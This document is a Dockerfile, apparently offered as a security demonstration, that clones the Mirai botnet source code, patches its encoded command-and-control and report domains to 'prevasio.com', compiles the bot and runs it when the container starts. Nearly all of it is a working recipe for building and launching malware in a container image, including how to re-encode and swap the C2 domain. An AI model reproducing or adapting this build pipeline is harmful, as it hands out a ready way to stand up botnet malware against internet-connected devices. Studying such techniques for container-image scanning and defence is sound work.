Dockerfile

The following Dockerfile example demonstrates dynamic malicious container image creation.

The instructions from this file will fetch Mirai from Github, patch the default C2 server name with 'prevasio.com', then compile Mirai bot as /mirai_bot.

# the image is based on Ubuntu v14.04.5
FROM ubuntu:14.04.5

# updates the package lists
RUN apt update

# install GCC compiler
RUN apt install -y gcc

# install Git
RUN apt install -y git

# fetch Mirai source code
RUN git clone https://github.com/jgamblin/Mirai-Source-Code

# compile string encoder tool
RUN gcc /Mirai-Source-Code/mirai/tools/enc.c -o /Mirai-Source-Code/mirai/tools/enc.out

# drop a shell script into /patch
RUN echo "#!/bin/sh" > /patch

# mirai's source code contains encoded string 'cnc.changeme.com'
# here, we run string encoder tool to encode 'cnc.changeme.com', then escape the encoded string with sed command
# the encoded string is placed into old_cnc variable
RUN echo "old_cnc=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string cnc.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch

# do the same with the encoded string 'report.changeme.com'
RUN echo "old_report=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string report.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch

# now, encode 'prevasio.com' - our C2's new domain name
# for ethical and legal reasons, this is to make sure we don't touch someone else's domain name
RUN echo "new_domain=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string prevasio.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch

# next, we'll need to patch the source file table.c
# this is to replace encoded 'cnc.changeme.com' with encoded 'prevasio.com'
RUN echo "sed -i \"s/\$old_cnc/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch

# do the same to replace encoded 'report.changeme.com' with encoded 'prevasio.com'
RUN echo "sed -i \"s/\$old_report/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch

# make our script executable
RUN chmod +x /patch

# run it to make 2 patches to table.c source
RUN /patch

# drop a shell script to compile and run the bot into /compile_and_run
RUN echo "#!/bin/bash" > /compile_and_run

# compile the bot from source with GCC
RUN echo "gcc -std=c99 /Mirai-Source-Code/mirai/bot/*.c -DDEBUG -DMIRAI_TELNET -static -g -o /mirai_bot" >> /compile_and_run

# run the bot in the background
RUN echo "/mirai_bot" >> /compile_and_run

# make the script executable
RUN chmod +x /compile_and_run

# execute the script
CMD ["/compile_and_run"]